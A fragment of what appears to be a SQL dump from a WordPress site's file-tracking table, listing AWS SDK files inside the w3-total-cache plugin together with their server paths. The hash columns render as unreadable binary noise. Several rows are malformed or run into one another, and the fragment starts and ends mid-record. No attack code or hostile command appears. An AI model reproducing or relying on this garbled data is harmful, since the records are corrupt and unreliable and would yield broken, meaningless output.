BY4$ǜ}(ζ','',0,'?'),('6&q2','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ElasticTranscoder/ElasticTranscoderClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ElasticTranscoder/ElasticTranscoderClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lz[[','sgt-2*}-7J60','',0,'?'),('#UEY=|i\"','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ElasticTranscoder/Exception/ElasticTranscoderException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ElasticTranscoder/Exception/ElasticTranscoderException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hQ\nb\n7O|','7Օ8U#\\UyMDOvry','',0,'?'),('\ZEO#y~yR','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ElasticsearchService/ElasticsearchServiceClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ElasticsearchService/ElasticsearchServiceClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l#\\p','cZ\0m,&nwY7~[?4}','',0,'?'),('\04D(Vi,s','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ElasticsearchService/Exception/ElasticsearchServiceException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ElasticsearchService/Exception/ElasticsearchServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lt]emS','_,؇\ZaN)|\nAFJ9','',0,'?'),('Η޳f,W','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Emr/EmrClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Emr/EmrClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R*W\" dn|͵({','0q\nN^j[n)','',0,'?'),('l9ʜS3j(Fi+\r','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Emr/Exception/EmrException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Emr/Exception/EmrException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͂CTX.,.','\Z0?hzc\nrRW]zy;_e;*','',0,'?'),('B87M','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Endpoint/EndpointProvider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Endpoint/EndpointProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A#^\0C?','>\\E/0t,ڨ#$j.','',0,'?'),('2uƪEh%+','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Endpoint/Partition.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Endpoint/Partition.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z* @O6','Ѧ󺥼f\nC>IcCgD','',0,'?'),('1[㳄UF%F','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Endpoint/PartitionEndpointProvider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Endpoint/PartitionEndpointProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r=Ҭ\rG쏻','XV}<[6$ug҆1d','',0,'?'),('37!g','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Endpoint/PatternEndpointProvider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Endpoint/PatternEndpointProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oͪ\'nV]','`uh{&\Z҈<\0Jrl􂷦','',0,'?'),('l~|ɨV Ksc=','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/EndpointDiscovery/Configuration.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/EndpointDiscovery/Configuration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؠq؈C|N','):+8w@1R%5ʶ9K\"v','',0,'?'),('b Ӥ0m21','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/EndpointDiscovery/ConfigurationInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/EndpointDiscovery/ConfigurationInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b`u\ZUՌ9','\"gv2#RvS}gBF','',0,'?'),('.yTA Ugc','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/EndpointDiscovery/ConfigurationProvider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/EndpointDiscovery/ConfigurationProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yҵ$( $/0[',')9cG\n}y!\0ͻ\"H lj','',0,'?'),('O允FSL/','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/EndpointDiscovery/EndpointDiscoveryMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/EndpointDiscovery/EndpointDiscoveryMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/$ṯAYl','@9A캣:s\nəă2','',0,'?'),('Ϗj]nR4','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/EndpointDiscovery/EndpointList.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/EndpointDiscovery/EndpointList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R\"LCW}Sc','7[? #*)Sw','',0,'?'),('jN\":x ]','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/EndpointDiscovery/Exception/ConfigurationException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/EndpointDiscovery/Exception/ConfigurationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i\\Rd2V2A','f4Ͷ%iQqil\"','',0,'?'),('͛\ZJ#P','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Exception/CryptoException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Exception/CryptoException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P\Z՚ 0U~A','ߋ.q^}lu+ZcN S','',0,'?'),('LbM;','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Exception/CryptoPolyfillException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Exception/CryptoPolyfillException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%l.YLK','?qsꖎu5| (O/ޅ;','',0,'?'),('3֦oWH/','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Exception/EventStreamDataException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Exception/EventStreamDataException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Zhw; (6;]','vҲ>o6+Y:j- >nuJ','',0,'?'),('c \ZNTX','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Exception/IncalculablePayloadException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Exception/IncalculablePayloadException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7k\n[܃QZ','_{kxaZBWۻT0FR-iaG','',0,'?'),('gbc8Pf@','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Exception/InvalidJsonException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Exception/InvalidJsonException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Δo!H','P¾ϑa#-`\nIOWk5~','',0,'?'),(' DJ:1b)','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Exception/InvalidRegionException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Exception/InvalidRegionException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':C,<cБc','8秪Iy','',0,'?'),('}zK\ZhE4,','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Exception/UnresolvedApiException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Exception/UnresolvedApiException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o I,','-RD&2[:q$4Z3r}:','',0,'?'),('X<7T0߄','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Exception/UnresolvedEndpointException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Exception/UnresolvedEndpointException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k\0ion','\'XR0\\h;;[.\'(0w0Z','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Firehose/Exception/FirehoseException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Firehose/Exception/FirehoseException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}y߱\'_7Yk','-=\rl9UWF̛UE37*','',0,'?'),('jFV2','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Firehose/FirehoseClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Firehose/FirehoseClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M$;iCT$[e',' \'\nR>pT%d yΐO ','',0,'?'),('?[. d7ڼ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ForecastQueryService/Exception/ForecastQueryServiceException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ForecastQueryService/Exception/ForecastQueryServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S_g8.jmSۙ','3MXs5n>D\nh+y֫spk','',0,'?'),('Ɜµ\0ǵ`CK','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ForecastQueryService/ForecastQueryServiceClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ForecastQueryService/ForecastQueryServiceClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#~# ','Kb<%*cת}','',0,'?'),('El:','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ForecastService/Exception/ForecastServiceException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ForecastService/Exception/ForecastServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͉LvbsJ1摅3Me','\ZyA~dMvj}7wH3','',0,'?'),('wƚ(⸭Èf','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ForecastService/ForecastServiceClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ForecastService/ForecastServiceClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z=A!t3l >i','Cºm_ K2yuukRRI','',0,'?'),('M*K#Tͤf','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/FraudDetector/Exception/FraudDetectorException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/FraudDetector/Exception/FraudDetectorException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sרuw\0E','XkɉcȬeڹ','',0,'?'),('B kmKbLw ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/FraudDetector/FraudDetectorClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/FraudDetector/FraudDetectorClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m FI\rQ㝿','eu\'id Dߘv .7\\j','',0,'?'),(' GOܳ1','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GameLift/Exception/GameLiftException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GameLift/Exception/GameLiftException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!,\\Ԯe`Z#',' x{B@}?]}\0+ϛa/-','',0,'?'),('x^W1>EF','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GameLift/GameLiftClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GameLift/GameLiftClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#fOxhEL\n','6??;|u_?,et 4','',0,'?'),('L1 n=3','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Glacier/Exception/GlacierException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Glacier/Exception/GlacierException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FRmɑWD',' X;xeұWNS!','',0,'?'),('Uouc`kD~','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Glacier/GlacierClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Glacier/GlacierClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`4fg?','v_Uܕ>+QLy&#x{vo[X','',0,'?'),('m\rG( =','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Glacier/MultipartUploader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Glacier/MultipartUploader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}WL\0#','\"f;9=\"2vA9bXx@IS','',0,'?'),('vSM:[)M','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Glacier/TreeHash.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Glacier/TreeHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"De;\\I','5/lg;b|Iܤ+?EZ','',0,'?'),('+#LwZQ@nR','',0,'?'),('PW:','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Glue/GlueClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Glue/GlueClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wpG78{DA','\\tFN\ZEhDٱP\0)','',0,'?'),('qG^\'cJWY','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GlueDataBrew/Exception/GlueDataBrewException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GlueDataBrew/Exception/GlueDataBrewException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LIk<\ZxD','9|4#}WH“s:O!-','',0,'?'),('DMS>U,)','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GlueDataBrew/GlueDataBrewClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GlueDataBrew/GlueDataBrewClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`LUoK̺K ','Rw1w7ts*h3\\rT h.D&B','',0,'?'),('aΣpo9\nH','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Greengrass/Exception/GreengrassException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Greengrass/Exception/GreengrassException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pY WVmmL9 ',' E\rr\'ȉ%Ţ^p Vt[y','',0,'?'),('qjLTt&[','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Greengrass/GreengrassClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Greengrass/GreengrassClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KYtz݀>','.<)d﫱rj5!QV5啟)','',0,'?'),('?d.  m','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GreengrassV2/Exception/GreengrassV2Exception.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GreengrassV2/Exception/GreengrassV2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%gSI٘Tw','kT#`Nƾ0-PYGr','',0,'?'),('vk> c8Z','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GreengrassV2/GreengrassV2Client.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GreengrassV2/GreengrassV2Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I wl\\P#/hu ','`NgwY)7\"\"P(`_)','',0,'?'),('wOXBc6u','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GroundStation/Exception/GroundStationException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GroundStation/Exception/GroundStationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';cL','rm!qyt7H}|','',0,'?'),('gҜ~/\nߊU-\n','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GroundStation/GroundStationClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GroundStation/GroundStationClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SK̓KB!','<-lI9=9ee\ZH(0ͱ*','',0,'?'),('\\YZ ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GuardDuty/Exception/GuardDutyException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GuardDuty/Exception/GuardDutyException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DR;EGR&G ','%y^C(\roP DEd','',0,'?'),('j-S^rxw','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GuardDuty/GuardDutyClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/GuardDuty/GuardDutyClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ?z>܅H<˰','\\wIg侠l*?ɚ\Zn@V!} h','',0,'?'),('bFu\\h%HH V','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Handler/GuzzleV5/GuzzleHandler.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Handler/GuzzleV5/GuzzleHandler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','࿷Z\"9D^',' \\8wC?vj#]EI`jT','',0,'?'),('ƲE} !Թ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Handler/GuzzleV5/GuzzleStream.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Handler/GuzzleV5/GuzzleStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gӞӝKe','/_o~tz 69M\" `C','',0,'?'),('DZQ}_m','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Handler/GuzzleV5/PsrStream.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Handler/GuzzleV5/PsrStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','93l_B. ','uw݇0QB\'W 4T 3W{MZ','RLBܟ\'_CP\Z%wNHiL[','',0,'?'),('- )xdOe\nt0','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Health/Exception/HealthException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Health/Exception/HealthException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n4M4dKɱ','Qͯ5xF;`&hZ','',0,'?'),('!/qy+V','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Health/HealthClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Health/HealthClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':mxM=Aݐ','Ͼgm\\# ۽X','',0,'?'),('j\nY^DH$&l','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/HealthLake/Exception/HealthLakeException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/HealthLake/Exception/HealthLakeException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G>Mx ehZ5T','C}89F:}u+`g~7n','',0,'?'),('2bdgeZ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/HealthLake/HealthLakeClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/HealthLake/HealthLakeClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q=>T5ź','qy•;+ eǽnLp,sGQ,','',0,'?'),(' &','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/History.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/History.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`\ZgGF','eԳ]yTQ{L*','',0,'?'),('GXQ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IVS/IVSClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IVS/IVSClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','> #[5`! ','n@]ǝ}-:c/mG㋷F','',0,'?'),('hvxԗY','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Iam/Exception/IamException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Iam/Exception/IamException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p$+dˈq','C;ލiZ*EԩGr=','',0,'?'),('Tؐc\"','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Iam/IamClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Iam/IamClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':k0(zdN`','\ro%59Fe_}A5$xQғG','',0,'?'),('2=x`HJ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IdempotencyTokenMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IdempotencyTokenMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ExB7եIi /','\0 w݅ޯ<[&FeG`','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ImportExport/ImportExportClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ImportExport/ImportExportClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kw--\"b]','J?;4\r-\' %ԺlMCAj','',0,'?'),('-nQqNlv\'','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/InputValidationMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/InputValidationMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R][7mg','qIKP)󘺗ޕHzZX','',0,'?'),('F9c&tO\\:2','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Inspector/Exception/InspectorException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Inspector/Exception/InspectorException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OG\\-;H+','V2#1Ӿċt Dꋭe','',0,'?'),('It鬫^nJy','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Inspector/InspectorClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Inspector/InspectorClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' =0!X\nJR\r','W^(9J kV\')}*J','',0,'?'),(' q{V 4w|P','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoT1ClickDevicesService/Exception/IoT1ClickDevicesServiceException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoT1ClickDevicesService/Exception/IoT1ClickDevicesServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L\"\ZˠE9Lr','cP_-݆#ȖVŸ#','',0,'?'),('(MVt1փwod','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoT1ClickDevicesService/IoT1ClickDevicesServiceClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoT1ClickDevicesService/IoT1ClickDevicesServiceClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uN-%\n#E-޳','k\nǬ[V#D[̀*','',0,'?'),('uCeAQiJ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoT1ClickProjects/Exception/IoT1ClickProjectsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoT1ClickProjects/Exception/IoT1ClickProjectsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߭\\7Y','WpZa^PfN̫F.IhPQ=','',0,'?'),('u A½[/g','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoT1ClickProjects/IoT1ClickProjectsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoT1ClickProjects/IoT1ClickProjectsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w9z6V7','Pza)p6BZ=.]X)Z?','',0,'?'),('k+D!wX\'_v','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTAnalytics/Exception/IoTAnalyticsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTAnalytics/Exception/IoTAnalyticsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\jx&Xt','/O2h숮Ő1Gi,#x','',0,'?'),('曱:G|Wj','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTAnalytics/IoTAnalyticsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTAnalytics/IoTAnalyticsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#?U+:ԽlJ','ol]UfK\' 